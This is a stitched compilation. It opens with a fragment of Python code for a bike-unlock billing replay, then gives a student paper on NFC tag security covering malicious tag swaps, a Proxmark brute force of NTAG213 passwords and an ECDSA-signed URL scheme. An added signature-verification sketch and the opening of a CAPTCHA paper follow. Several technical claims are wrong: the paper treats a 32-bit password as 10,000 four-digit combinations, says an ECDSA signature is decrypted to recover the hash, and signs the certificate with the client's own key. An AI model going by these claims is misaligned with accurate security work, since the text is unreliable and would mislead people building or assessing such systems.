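            # A reported failed unlock closes the trip and waives the charge.
            trip.waived, trip.ended_at = True, now
            self.waivers[trip.user] = self.waivers.get(trip.user, 0) + 1

    def bike_locked(self, trip_id, now):
        trip = self.trips[trip_id]
        if trip.ended_at is None:
            trip.ended_at = now

    def amount_due(self, trip_id, now):
        trip = self.trips[trip_id]
        if trip.waived or trip.started_at is None:
            return 0
        # An open trip keeps accruing until a lock report arrives.
        end = trip.ended_at if trip.ended_at is not None else now
        return (end - trip.started_at) * self.RATE_PER_MINUTE


def replay(policy):
    """Replay three constructed sessions; return amounts due at minute 60 and waivers."""
    server = UnlockServer(policy)
    # Honest rider: key at minute 0, acknowledgement at 1, lock reported at 31.
    server.issue_unlock_key("t1", "honest", 0)
    server.acknowledge("t1", True, 1)
    server.bike_locked("t1", 31)
    # Client that blocks both the acknowledgement and the lock report.
    server.issue_unlock_key("t2", "blocker", 0)
    # Lock genuinely failed to open and the app reports it.
    server.issue_unlock_key("t3", "unlucky", 0)
    server.acknowledge("t3", False, 1)
    due = {trip.user: server.amount_due(tid, 60) for tid, trip in server.trips.items()}
    return due, dict(server.waivers)


if __name__ == "__main__":
    for policy in Policy:
        print(policy.value, replay(policy))
```

Under the recommended rule the blocking client is the most expensive session rather than a free one, which is the incentive change the section argues for.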
Securing NFC Tags

Chua Yu Peng, National University of Singapore, e0002852@u.nus.edu
Lee Ying Jie, National University of Singapore, a0130720@u.nus.edu
Teng Yong Hao, National University of Singapore, e0003881@u.nus.edu
Wang Weili Aloysius, National University of Singapore, a0124472@u.nus.edu

ABSTRACT
Given the widespread usage of NFC tags today, particularly at bus stops for advertising purposes, not many people have stopped to consider whether these tags are safe to interact with, or even if they are secure. Thus, the authors have taken it upon themselves to investigate this issue, and this paper documents the efforts put into a study of the vulnerabilities of NFC tags, in particular NTAG203 and NTAG213. The paper also lists out measures the authors have implemented to allow for authentication to take place for these tags, with backwards compatibility allowed.

General Terms
Experimentation, Security, Theory.

Keywords
Near Field Communication (NFC), Android, Public Key Infrastructure (PKI), Digital Signature.

1. INTRODUCTION

1.1 Near field communication (NFC)
The adoption of Near-Field Communication (NFC) has grown drastically over the years. As shown in a survey conducted by Juniper Research, it is projected to have a take-up rate of more than five times its past user base of 101 million NFC-based transactions in 2014, to more than 500 million users by the end of 2019 [1]. This prevalence can be attributed to the success of smartphones. Due to NFC's widespread presence, more and more devices, such as credit cards, door keys and advertisement materials, are turning to this contactless technology to enhance the user experience.

1.2 Motivations
Despite its obvious benefits in convenience and ease of use, there has been no clear way to verify the authenticity of an NFC tag in an event where an adversary introduces a malicious NFC tag which compromises a user's NFC enabled device. For example, the adversary could insert a malicious web address and the user's NFC enabled smartphone could read the tag and access the link immediately as long as NFC was enabled and the phone was not locked.

As briefly mentioned, NFC is projected to see a great rise in usage and implementations in the near future. It is imperative that NFC be secure and publicly accessible NFC tags be authenticated.

This paper will thus look into the background and workings of NFC, before heading into some existing vulnerabilities of NFC tags and potential exploits that can be carried out on the tags. It then segues into our proposed implementation, by means of a smartphone application, that can allow the addition of digital signatures into NFC tags and for users to authenticate such NFC tags, before ending with an overarching conclusion on the project.

2. OVERVIEW OF NFC

2.1 History
NFC has been around for decades, ever since it was approved in 2003 as an ISO/IEC standard, and later as an ECMA standard. It is rooted in radio frequency identification technology, better known as RFID, which uses electromagnetic induction in order to transmit information. Since the approval, it has been gaining traction steadily, first picked up by Nokia, Philips and Sony when they established the NFC Forum in 2004 [2], to coming out with NFC tags in 2006, to NFC enabled phones appearing in 2010, and even specialised NFC advertising companies being established such as Tapit Media in 2011. Today, various online wallets are implemented with NFC, most notably Apple Pay and Android Pay [3], and many credit cards also come equipped with NFC capabilities to allow ease of payment for their customers.

2.2 What It Is
To understand NFC, it may be wise to first take a brief glance at RFID. Essentially, RFID is the usage of radio waves for the unique identification of a variety of objects. The implementation of such a system constitutes 2 parts: a tag, as well as a reader. There are currently 3 different frequencies at which passive RFID tags operate:

• Low Frequency (LF) 125-134 kHz
• High Frequency (HF) 13.56 MHz
• Ultra High Frequency (UHF) 856 MHz to 960 MHz

All 3 frequency bands have different applications across the industry. NFC, which is the focus of this document, operates at the 13.56 MHz [4] frequency band, as a branch of the HF RFID communication protocols. NFC allows two electronic devices to establish a connection with each other as long as they are within a close proximity of 4 centimeters to each other. Similar to

gp04
PDFsam_merge 25
29
Bluetooth, WiFi, and other wireless communication technology standards, NFC sends information over radio waves, with data transmission rates at either 106, 212 or 424 kilobits per second. After the connection is successfully established, it can then activate a set of functionalities of the NFC enabled device.

2.3 Current Uses
From contactless payment systems to acting as identity and access tokens and even gaming, NFC enjoys a wide range of applications in the world today. Over the years, it has become more and more prevalent to incorporate NFC into our daily lives. Some example uses include both Android Pay and Apple Pay, as mentioned previously, and also Samsung smart doors, where you have the option to use a card to unlock your door instead of traditional keys. An innovative idea might be the incorporation of NFC tags into your business card for your potential customers to access, say, your website virtually instantly!

2.4 Prospect
The usage of NFC and NFC-based development also appears to be on track to expand even further, as Apple Inc. announced [5] that with the current version of its mobile operating system, iOS 11, it now allows third-party developers to read from NFC tags. Most Android smartphones already have the capability to read and/or write onto NFC tags with appropriate software. With 99.6% of new smartphones now being either the iPhone or Android-based [6], it can be said with certainty that NFC will continue to see a great rise in usage over the next few years.

3. EXPERIMENTATION PROCESS

3.1 Overview of NTAG203/NTAG213
Developed by NXP Semiconductors, NTAG203 and NTAG213 have only the capacity of 144 bytes compared to their larger-storage counterparts. However, these are more widely available due to their compatibility with a wide range of smartphones and lower cost. The difference between NTAG203 and the newer variant, NTAG213, is that the latter features a 32 bits 4 digits password [7], enabling restriction of operations that may alter the memory of an NFC tag. An NFC tag is typically used to facilitate transmission of information. It can store various MIME types such as a URL, credentials to a wireless access point or a text file. Typically, the smartphone operating system will open an application to serve the content of the NFC tags to the users.

3.2 Vulnerabilities
NTAG203/NTAG213 can be commonly found in public spaces, such as bus stops, where it is used as a means to disseminate information.

For example, Clear Channel Singapore [8], an outdoor advertising company, makes use of NFC in their various advertisement platform offerings to encourage users to interact with the displayed content. According to the company, the NFC-incorporated advertising platforms can enable the target audience to interact with the advertised content in a variety of ways, such as by purchasing vouchers on the spot, downloading music or videos, or simply browsing the information that is being offered. Clear Channel claims that they are operational at 8 out of every 10 bus stops in Singapore, and that a two-week advertising campaign can generate an outreach of 80% of the population. This presents a worrying situation as its ease of use and availability can serve as an effective means to mass deploy malicious payload. Public spaces where the tags can be found are often accessible to anyone at any time, and one can easily gain physical access to the tags. It is also not difficult to perform malicious actions on those tags, as they have no mechanism to ensure their security.

If an NFC tag containing a link is scanned, the smartphone (Android-based) will not ask the user for a confirmation before launching the browser and accessing the URL obtained. By directing the unsuspecting user to a spoofed website, the attacker can proceed to conduct browser based attacks such as XSS and CSRF, or phishing attacks to steal important credentials, or even trick the user into mistakenly installing malware whilst being under the impression that they were downloading an advertised file on posters accompanying the NFC tags. In a bid for efficiency, the smartphone will launch applications to serve the NFC content without explicitly asking for user approval or choice of application [9]. This could potentially be very dangerous.

According to a survey conducted by CNBC [10], less than 14% of the surveyed smartphone users do not have antiviruses installed on their phones. Any attack that surfaces might have an undesirably high chance of success. Examples of attack scenarios will be discussed further in the following subsection.

3.3 Analysis on Possible Exploits

3.3.1 Social engineering
In a social engineering attack, the attacker can prey on unwary victims by simply pasting a malicious NFC tag over a legitimate one and restricting interaction with the latter via the use of a Faraday cage, as described previously. The malicious tag may contain a URL to a phishing website or wireless credentials to a rogue wireless access point.

To carry out the attack, the attacker must first gain physical access to the NFC tag and be unrestricted from physically tampering with it. This is, however, likely to be the case every time as the very nature of NFC's close-proximity workings dictates that anyone will be able to go up to the tag and interact with it.

In addition, since the NTAG203/NTAG213 tags can be purchased from the Internet both easily and cheaply for under a dollar, coupled with the fact that most smartphones come equipped with an NFC reader/writer, any person with such devices will be able to write their own NFC tags at a very low cost. As such, it can be assumed that this mode of attack will be relatively easy to do for the attacker.

In fact, as seen in ATM skimming attacks, given enough time and effort, attackers will be able to produce skimmers that are nearly indistinguishable from a legitimate card swipe mechanism on an ATM. This spells trouble where malicious NFC tags are concerned, as they are far easier and faster to obtain and replicate.

3.3.2 Brute force attacks on NTAG213
The newer variant, NTAG213, features a password system to restrict unauthorized access and also contains a safety mechanism to lock itself after a defined number of failed password attempts. Given this, one would expect that brute force attacks should be less effective on the NTAG213.

It is, however, unfortunate that despite having the aforementioned security mechanisms in place, it is still possible for an attacker to read and emulate an NTAG213 tag that has such locks enforced, even with a very small allowed number of failed password

attempts (e.g. 3). With the use of Proxmark3, a powerful general-purpose RFID tool, the attacker can emulate and launch a brute force attack even with such restrictions [11]. By emulating the tag, the counter for number of password attempts for the original tag will thus be maintained at 3. This allows the attacker freedom to brute-force all possible password combinations in a relatively small amount of time, given that there are at most 10000 different password combinations available for the 4-digit (32-bit) password.

3.4 Remarks on Existing Exploits
Even though some form of security mechanism is implemented in both NTAG203 and NTAG213, they prove to be ineffective when faced with modern methods of attack. If we were to incorporate security into NFC tags properly, authenticity and integrity are key components that cannot be overlooked. Therefore, our proposed implementation shall address methods where security can be retrofitted to NTAG203 and NTAG213 to guarantee authenticity and integrity in a scalable and also backward compatible manner.

4. DESIGN CONSIDERATIONS
Before we move on to our solution, we will discuss the considerations undertaken in the design process. As discussed in the previous section, it is crucial that we guarantee authenticity and integrity in NTAG203 and NTAG213. To be able to use it seamlessly with both older and newer tags, our solution also has to be scalable and backwards compatible.

4.1 Security Requirements

4.1.1 Fundamentals
• Authenticity: Given two NFC tags, n and n', we must be able to know if these tags come from trustworthy sources.
• Integrity: The data that is stored inside the NFC tags must not have been tampered with. We must also be able to make a judgement call on whether to load the data based on whether it has been tampered with or not.
• Non-repudiation: The signer of the tag is not able to deny that the tag is signed by them.

4.1.2 Attack models of adversary
These are the possible attack models that an adversary can employ.
• Total break: The adversary wants to find our private key.
• Selective forgery: Given a message m, the adversary wants to forge the signature.
• Existential forgery: The adversary wants to create message-signature pairs (m,s) that are valid.

4.2 Hash-Then-Sign Approach
Using the hash-then-sign approach to signing prevents the forgery attacks highlighted in the attack models above. This is because the hash function makes it computationally infeasible for the adversary to arrive at a collision on the resulting digest. However, in order to achieve this, the chosen hash function must be cryptographically secure. If it is not second preimage resistant, the adversary will be able to find a collision where different messages m and m' undergo the same hash function H but result in the same digest, i.e. H(m) = H(m'). Since Signature(H(m)) = Signature(H(m')), the adversary will be able to forge a signature with the hash collision. Therefore, we chose SHA384 as our choice of a cryptographically secure hash. Additionally, with the use of this hash, performance can be improved in terms of easier computation of the signature.

4.3 Elliptic Curve Digital Signature Algorithm (ECDSA)
The NTAG213 has a storage limit of 144 bytes, while the length of a typical URL can take 40 bytes or more. This leaves us with 144 - 40 = 104 bytes to work with for the digital signature. A Base64-encoded 256-bits signature takes up 96 characters (bytes), making it just enough to fit into the NFC tag.

Since ECDSA uses Elliptic Curve Cryptography, it allows us to use a relatively smaller number of bits for comparable security levels with other Public Key Infrastructure (PKI) cryptographic schemes such as RSA and ElGamal.

A signer has the ability to choose any named curves to be used according to their specific security requirements, as long as OpenSSL supports them. This is useful for when a specific domain requires a smaller key length to allow more space for a longer URL, or a larger key length can be used for domains with shorter URLs.

Our recommendation is the Prime256v1 curve. The security of the 256 bits of ECC is comparable to the security of the 3072 bits of RSA and ElGamal [12]. Not only that, it should fit in the NFC tag together with an average URL length. According to NIST's recommendation [13], 256 bits of Elliptic Curve is secure beyond 2030. Other curves such as prime192v3 or prime239v3 can also be used. They are 192 bits and 239 bits respectively.

4.4 PKI
PKI is used as an infrastructure to securely transfer the public keys as a form of certificate. It also makes our business flow highly scalable. Suppose companies express interest in using our application for securing their advertisement-purposed NFC stickers. If they already own a public certificate signed by a trusted Certificate Authority, we will have no issues verifying their identity and deeming them as trustworthy content providers. The exact business flow will be discussed later in section 5.2.1.

4.5 Revocation of Certificate
In the event where a registered company's private key is leaked or compromised, their certificate has to be revoked for security reasons. In our implementation, all public keys belonging to our registered organisations are hosted on our database and will only be downloaded into our mobile application when necessary. To achieve this revocation of certificates, our website can do a push notification to our mobile application to purge the cache of a revoked certificate.

4.6 Backwards Compatibility
We want to maximise backwards compatibility so that the rollout of our proposed implementation can happen in phases, without requiring abrupt changes or an entire overhaul of the old system. This allows for a smooth transition to the new scheme.

4.7 Other Considerations
This idea should not extend well to public URL shortener services like goo.gl as anyone can create a URL without verification.

5. PROPOSED SECURITY IMPLEMENTATION

5.1 RetrofitSecureNFC
RetrofitSecureNFC is an Android application that is able to run on any smartphone with an NFC scanner and with Android 5.0 or later as its operating system. It makes use of Spongy Castle [14], a cryptographic library for Android.

5.1.1 How it works
In Android, an application can get notified of an NFC event from the operating system by subscribing to events such as:
• ACTION_NDEF_DISCOVERED
• ACTION_TECH_DISCOVERED
• ACTION_TAG_DISCOVERED

The ACTION_NDEF_DISCOVERED event enables applications that are not running in the foreground to handle an NFC event. However, it requires the application to subscribe to domains that it intends to handle at compile-time. The subscribed domains must be at least a Partially Qualified Domain Name (PQDN) with a third-level-domain name i.e. *.nus.edu.sg and it cannot be a wildcard i.e. *.sg or *.

For instance, if RetrofitSecureNFC subscribes to the *.nus.edu.sg domain, then the Android OS will run RetrofitSecureNFC to handle such links belonging to registered domains. This subscription example can be found in the code snippet depicted in Figure 1 below.

Figure 1. Example code snippet of URL subscription

As it is not possible to subscribe to all URL links with the ACTION_NDEF_DISCOVERED event, the ACTION_TAG_DISCOVERED event is then used to intercept any other links that are not subscribed. However, this requires the application to be running in the foreground.

We shall now go into an example to illustrate how the application works. Suppose an NFC tag contains this URL as its payload:

http://news.nus.edu.sg/highlights/grants-promote-cybersecurity-research?sig=MEYCIQD1NuJzQSzPWhVQPk5WbIbP8MoYZ1jHR/tBwb25/b0d5QIhANAJU0s/QJInSsRz4mXE+JT9JTPdL5IN/l5L20ekFjBL

Since RetrofitSecureNFC explicitly subscribes to the *.nus.edu.sg domain, the application must already know how to handle it. In our case, we already have a public key for the *.nus.edu.sg domain. After Android OS passes the handler to RetrofitSecureNFC, the application will then parse the URL to obtain its domain and sig from the GET parameters, as can be seen in the URL above. Thereafter, it uses the domain (i.e. nus.edu.sg) as a key to fetch the public certificate of the domain from the application storage, which will be used for decryption later on.

Let the public certificate for the domain be as follows, in Figure 2:

Figure 2. Public certificate for domain

The text representation of the certificate above can be found in Figure 3:

Figure 3. Text representation of public certificate

In our example URL, the sig in the GET parameter is the Base64 encoded representation of the digital signature of the entire link it is appended to. We can now see that our digital signature in Base64 encoding is equivalent to:

MEYCIQD1NuJzQSzPWhVQPk5WbIbP8MoYZ1jHR/tBwb25/b0d5QIhANAJU0s/QJInSsRz4mXE+JT9JTPdL5IN/l5L20ekFjBL

We now decode the signature back to its binary representation with a simple Base64 decode function. What we get is a binary value that looks something like this:

0F!6sA,ZP>NVlgXGA! SK?@'Jse%3/
^KG0K

Next, the digital signature in binary representation is decrypted using the public certificate we fetched earlier to obtain a SHA384 hash of the URL. The resultant hash of SHA384(URL) will thus look something like this:
aa1a4c76a1ec9220f10f03baba96e7d3d0e79f8751a5529814dba513dbaac715cee65b928231754a8b91f571a6277de9
Following that, we get the substring of the original URL without the sig parameter, and do a SHA384 hash on that URL. Finally, we do a comparison between the two hashes, and if they are equal, we are able to verify that the identity of the URL is authentic.
If the two hashes do not match, we can assume that the payload has been tampered with, and refuse connection to the URL inside the tag. This way, we provide a mechanism to authenticate and secure the NFC tags.

5.1.2 Application in action
Figure 4 below illustrates the splash screen of RetrofitSecureNFC. It is the default screen seen when the application is launched and there are no NFC tags nearby to be read.

Figure 4. RetrofitSecureNFC: splash screen

When the user’s NFC-enabled Android device scans an NFC tag, and RetrofitSecureNFC is able to authenticate the tag, the user will be allowed to proceed to load the content into another appropriate application, e.g. a browser for opening URLs. Figure 5 below shows the screen that is displayed upon successful authentication.

Figure 5. RetrofitSecureNFC: successful authentication screen

On the other hand, if our application cannot verify the authenticity of the NFC tag being read, the user will be prevented from proceeding with the data read. Figure 6 shows the screen displayed when an NFC tag cannot be authenticated.

Figure 6. RetrofitSecureNFC: unsuccessful authentication screen

5.2 Beyond RetrofitSecureNFC

5.2.1 Possible business flow
We will now postulate about possible improvements on top of our proposed solution. Suppose Company A would like to enrol into our programme. Given that situation, there are 3 possible cases to consider.
Case 1: Company A already has an ECC public certificate signed by a well-known trusted root
1. We simply include the certificate in our application.
Case 2: Company A has a public certificate signed by a well-known trusted root
1. We generate a pseudorandom sequence, say R, and we encrypt it using Company A’s public certificate.
2. We send it as a form of challenge to Company A.
3. Company A should return the decrypted pseudorandom sequence R within a small, specified window of time.
4. Since Company A has no ECC certificate, we will request Company A to generate an ECC private key using OpenSSL, and then generate a CSR from it. We will only take the CSR from Company A.
5. We validate the CSR, extract Company A’s public key from the CSR and sign a public certificate.
6. We then include the certificate in our application and send the certificate back to the company.
Case 3: Company A has no public certificate signed by a well-known trusted root
1. We contact and validate Company A’s entity, intention and usage for joining our programme.
2. Since Company A has no ECC certificate, we request Company A to generate an ECC private key using

OpenSSL, then generate a CSR from it. We only take the CSR from Company A.
3. We validate the CSR, extract Company A’s public key from the CSR and sign a public certificate.
4. We will include the certificate in our application and also send it back to the company.

5.2.2 Creating ECC keys using OpenSSL
Referring to the previous example of Case 2, we see that Company A was required to generate ECC keys using OpenSSL. In this section, we briefly go through how. By using OpenSSL, a well-known open source library for creating keys and certificates, one can easily generate elliptic curve keys by using the following commands.
The following command will output a list of named curves supported by OpenSSL:
openssl ecparam -list_curves
Suppose Company A chooses to use the prime256v1 curve. All it has to do is enter these commands:
openssl ecparam -genkey -name prime256v1 -noout -out key.pem
openssl req -new -sha256 -key key.pem -out csr.csr
The resultant csr.csr file will be sent to us, and we will use the following command to sign the certificate:
openssl req -x509 -sha256 -days 365 -key key.pem -in csr.csr -out certificate.pem
We are then able to add the certificate into our database for usage in future verifications of NFC tags signed by Company A.

6. POTENTIAL SCHEME FOR OTHER DEVICES
This project highlights the possibility that a more robust authentication scheme could be extended to QR codes or even to the NUS matriculation and/or staff cards. NFC tags (NTAG203 and NTAG213 in particular) have a very small storage size of 144 bytes, and our scheme remains secure even with the space constraints. We will thus be able to apply this scheme to data-containing mediums with similar storage capacities, for example QR codes, and give authenticity to such mediums, providing security across multiple data storage platforms.

7. CONCLUSION
In conclusion, we would like to reiterate that the current NFC tags are lacking in many aspects of security. Companies such as BlackSeal by TrustPoint, together with the NFC Forum, are pushing for secure standards in NFC protocols such as NFC tags with signature RTD 2.0. However, without any widespread attacks on NFC, there is no motivation nor urgency for the industry to adopt such standards. As it is predicted that NFC’s usage and implementations will continue to rise, we can say with certainty that an NFC based attack in the future is inevitable. Preemptive measures should be undertaken and we strongly recommend that secure standards be incorporated into NFC enabled devices as a default protocol.

8. ACKNOWLEDGEMENTS
The authors of this paper would like to extend their gratitude to A/Prof Hugh Anderson for his guidance and support throughout this project, helping us to procure the NTAGs and card readers for our project and offering timely feedback on the direction of the project.

9. REFERENCES
[1] Smith, S. (n.d.). Apple Pay and HCE To Push NFC Payment Users to More Than 500 Million by 2019, Juniper Research Finds. Retrieved November 10, 2017, from https://www.juniperresearch.com/press/press-releases/apple-pay-and-hce-to-push-nfc-payment-users-to-mor
[2] Vanderkay, J. (2004, March 18). Nokia, Philips And Sony Establish The Near Field Communication (NFC) Forum. Retrieved November 10, 2017, from https://nfc-forum.org/newsroom/nokia-philips-and-sony-establish-the-near-field-communication-nfc-forum/
[3] Google Launches Android Pay App. (2015, September 11). Retrieved November 10, 2017, from https://blog.chinavasion.com/index.php/36924/google-launches-android-pay-app/
[4] Triggs, R. (2017, August 15). What is NFC & how does it work? Retrieved November 10, 2017, from https://www.androidauthority.com/what-is-nfc-270730/
[5] Hern, A. (2017, June 07). The 10 biggest changes Apple didn't announce on stage at WWDC. Retrieved November 10, 2017, from https://www.theguardian.com/technology/2017/jun/07/apple-wwdc-changes-announce-on-stage-wired-keyboards-facebook-twitter-ios-11-pencil
[6] Vincent, J. (2017, February 16). 99.6 percent of new smartphones run Android or iOS. Retrieved November 10, 2017, from https://www.theverge.com/2017/2/16/14634656/android-ios-market-share-blackberry-2016
[7] NXP Semiconductors N.V. (2015, June 02). NTAG213/215/216 Product data sheet. Retrieved November 10, 2017, from https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf
[8] Clear Channel. (n.d.). Retrieved October 03, 2017, from http://www.clearchannel.com.sg/impact/bits-pixel#connect
[9] Google Inc. (2017, July 24). Retrieved November 10, 2017, from https://developer.android.com/guide/topics/connectivity/nfc/nfc.html
[10] Weisbaum, H. (2014, April 26). Data at risk as Americans don't protect smartphones. Retrieved November 10, 2017, from https://www.cnbc.com/2014/04/26/most-americans-dont-secure-their-smartphones.html
[11] Proxmark developers community. (n.d.). Retrieved November 10, 2017, from http://www.proxmark.org/forum/viewtopic.php?id=2657
[12] How do RSA and ElGamal key sizes compare? (2014, October 10). Retrieved November 10, 2017, from https://crypto.stackexchange.com/questions/19583/how-do-rsa-and-elgamal-key-sizes-compare

[13] Giry, D. (2017, February 23). Cryptographic Key Length
Recommendation. Retrieved November 10, 2017, from
https://www.keylength.com/en/4/
[14] Spongy Castle. (n.d.). Retrieved November 10, 2017, from
https://rtyley.github.io/spongycastle/
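
The tag check of Section 5.1.1 (split off sig, Base64-decode it, verify it against the domain's stored key), as an added Python sketch that is not the RetrofitSecureNFC source. It assumes ECDSA over prime256v1 with SHA-384, consistent with the 72-byte DER signature in the example URL; an ECDSA verifier hashes the unsigned URL itself and checks it against the (r, s) pair rather than recovering a hash from the signature. The curve arithmetic is textbook code for illustration, and the key pair, nonce and function names are constructed here.

```python
import base64
import hashlib

# prime256v1 (NIST P-256) domain parameters.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551

# Example URL from Section 5.1.1; the matching public key is not printed on the page.
PAGE_URL = ("http://news.nus.edu.sg/highlights/grants-promote-cybersecurity-research"
            "?sig=MEYCIQD1NuJzQSzPWhVQPk5WbIbP8MoYZ1jHR/tBwb25/b0d5QIhANAJU0s/"
            "QJInSsRz4mXE+JT9JTPdL5IN/l5L20ekFjBL")

def on_curve(pt):
    """Reject public keys that are not points on the curve."""
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0

def add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None or p2 is None:
        return p1 or p2
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    num, den = (3 * x1 * x1 + A, 2 * y1) if p1 == p2 else (y2 - y1, x2 - x1)
    lam = num * pow(den % P, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def mul(k, pt):
    """Double-and-add scalar multiplication (illustrative, not constant time)."""
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc

def split_signed_url(url):
    """Return (url_without_sig, signature_bytes); sig must be the last parameter."""
    # Split by hand: a query-string parser would turn '+' in the Base64 into a space.
    idx = max(url.rfind("?sig="), url.rfind("&sig="))
    if idx < 0:
        raise ValueError("no sig parameter")
    return url[:idx], base64.b64decode(url[idx + 5:], validate=True)

def parse_der_sig(der):
    """Strictly parse SEQUENCE { INTEGER r, INTEGER s } (short-form lengths only)."""
    if len(der) < 8 or der[0] != 0x30 or der[1] != len(der) - 2:
        raise ValueError("not a DER ECDSA signature")
    ints, pos = [], 2
    for _ in range(2):
        length = der[pos + 1] if pos + 2 <= len(der) else 0
        body = der[pos + 2:pos + 2 + length]
        if der[pos:pos + 1] != b"\x02" or not body or len(body) != length or body[0] & 0x80:
            raise ValueError("bad INTEGER")
        ints.append(int.from_bytes(body, "big"))
        pos += 2 + length
    if pos != len(der):
        raise ValueError("trailing bytes")
    return ints[0], ints[1]

def digest_int(message):
    """SHA-384 of the unsigned URL, truncated to the leftmost 256 bits as ECDSA requires."""
    h = hashlib.sha384(message.encode()).digest()
    return int.from_bytes(h, "big") >> (len(h) * 8 - N.bit_length())

def verify(url, pub):
    """True only if the trailing sig is a valid signature over the rest of the URL."""
    try:
        message, der = split_signed_url(url)
        r, s = parse_der_sig(der)
    except ValueError:
        return False
    if not (0 < r < N and 0 < s < N and on_curve(pub)):
        return False
    w = pow(s, -1, N)
    pt = add(mul(digest_int(message) * w % N, G), mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r

def sign_url(url, priv, k):
    """Constructed-data helper: append ?sig= using a caller-supplied nonce k."""
    r = mul(k, G)[0] % N
    s = pow(k, -1, N) * (digest_int(url) + r * priv) % N
    body = b"".join(b"\x02" + bytes([len(i)]) + i for i in
                    (v.to_bytes((v.bit_length() + 8) // 8, "big") for v in (r, s)))
    return url + "?sig=" + base64.b64encode(b"\x30" + bytes([len(body)]) + body).decode()

if __name__ == "__main__":
    priv, k = 0xC0FFEE, 0x5EED          # constructed toy key and nonce, not from the page
    signed = sign_url("http://news.nus.edu.sg/highlights/constructed-page", priv, k)
    print(verify(signed, mul(priv, G)))                                  # genuine tag
    print(verify(signed.replace("constructed", "tampered"), mul(priv, G)))  # altered payload
```

Any change to the path, a missing or truncated sig, or a signature made with a different key makes verify return False, which is the case in which the page's application refuses to open the link.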

VideoCaptcha

Ong Liwei, School of Computing, National University of Singapore, 21 Lower Kent Ridge Rd, Singapore 119077, +65 98578398, a0124093@u.nus.edu
Lim Wei Jie, School of Computing, National University of Singapore, 21 Lower Kent Ridge Rd, Singapore 119077, +65 88766462, e0003013@u.nus.edu
Marcus Ng Wen Jian, School of Computing, National University of Singapore, 21 Lower Kent Ridge Rd, Singapore 119077, +65 97502493, e0003142@u.nus.edu
Mooi Chung Yu Dexter, School of Computing, National University of Singapore, 21 Lower Kent Ridge Rd, Singapore 119077, +65 98317385, a0124586@u.nus.edu
Low Bao Ling Vivian, School of Computing, National University of Singapore, 21 Lower Kent Ridge Rd, Singapore 119077, +65 98317385, e0002546@u.nus.edu

ABSTRACT
In this paper, we investigate the phenomenon of Completely Automated Public Turing tests to tell Computers and Humans Apart (CAPTCHA) being broken with increasing accuracy: the attack vectors and current mitigations.
We document our attempt to make an enhancement to this existing captcha to make a captcha that is easy to solve for humans but harder to break for bots.

Categories and Subject Descriptors
K.6.5 [Management of Computing and Information Systems]: Security and Protection.

Keywords
Video CAPTCHA, Automated Turing Test

1. INTRODUCTION
Conventional CAPTCHAs revolve around getting users to identify distorted letters and have been the go-to method of deterring bots for years. As mentioned in our project objective, we noticed that such captchas are being solved with alarming ease by machines (aka bots).
We attribute one of the main reasons to the increasing “intelligence” of software - technological advancements in the recent years have reduced the average difficulty in automating captcha solving. CAPTCHA-solving services can be found online easily; such services may achieve their objective through optical character recognition (OCR), or data curation of as many captcha images as possible. On a lower level, open-source libraries with trained OCR models (such as pyocr and pytesseract) are widely available to allow almost anyone to automate a CAPTCHA attack. [1]

Table 1. List of CAPTCHA solving services online (non-exhaustive)

2. CONCERNS

2.1 Security
Security of the CAPTCHA process is definitely the main concern for software systems or web applications. If bots were able to break CAPTCHA defences with such ease, then not only would it not deter spam traffic, but damage the business. We look at some of the methodologies (attack vectors) employed.

2.1.1 Optical Character Recognition (OCR)
This machine-learning based method has been widely used to solve text-based visual CAPTCHAs, as mentioned in Section 1. The fundamental concept of OCR involves feeding binary representations of distorted text images as inputs into a trained neural network.

2.1.2 Replay attack
Several CAPTCHA implementations associate a session ID or key with every CAPTCHA challenge. Attackers can simply utilize the solution to one image multiple times by reusing the key. Such an attack can also be classified under weak implementation/design flaw. Such attacks are less prevalent now as mitigation is fairly simple: adding expiration to every session ID, or enforcing one-time use.

2.1.3 Hash tables
This vector of attack is specific to object-based CAPTCHA (Section 4.1). By outsourcing CAPTCHA challenges to be manually solved by humans, attackers are able to amass a large database of CAPTCHA-answer pairs.

2.2 Accessibility
Accessibility issues have been one of the topics that has sparked much controversy for adopting CAPTCHA systems. In North America alone, nearly 50% of internet users suffer from some form of disability. In particular, users with reading/seeing difficulties and color blindness make up 32% of the population. [2] These users are most affected by CAPTCHAs and require alternative methods to be identified as a human. CAPTCHA providers have to factor this into consideration when developing alternative CAPTCHA methods.
The main alternative for visual CAPTCHAs currently are audio CAPTCHAs, where users are supposed to input the letters which are heard from the spoken audio clip. The audio clips are deliberately noise enhanced to make any form of programmatic voice recognition difficult. Even so, this CAPTCHA method is still easier to decode compared to current CAPTCHA evolutions as discussed in Section 3. The trade-off from employing such implementations is that a majority of them have severe accessibility issues. As such, CAPTCHA providers have to include an audio-based alternative together with their visual-based widgets. [3] This opens up an attack vector similar to a downgrade attack, where bots are able to opt for audio-based CAPTCHA verification.

Figure 2: Disability statistics in North America region

3. RECTIFICATION
We set out to investigate and assess a few of the approaches taken by several companies and/or websites in recent times to mitigate the aforementioned phenomenon, and after obtaining the necessary information brainstorm on how we can re-innovate the captcha process without losing its initial intended purpose.

3.1 Gamified CAPTCHA
FunCAPTCHA came up with the idea of amalgamating games with the CAPTCHA-solving process. Users are given an image of an animal writ large, that is not upright, and are asked to rotate them to an upright position using the left and right buttons provided. While there is no additional level of security provided with this variation, it does attempt to mitigate the issue of bad user experience generally associated with CAPTCHA solving.

3.2 Object-based CAPTCHA

Figure 3. Object-based CAPTCHA

reCAPTCHA’s 2014 release features a CAPTCHA system that required users to select images out of nine that contained a particular object. The motivation for this CAPTCHA variation is that solving these CAPTCHAs using image recognition would be much harder to perform than the text-based ones.
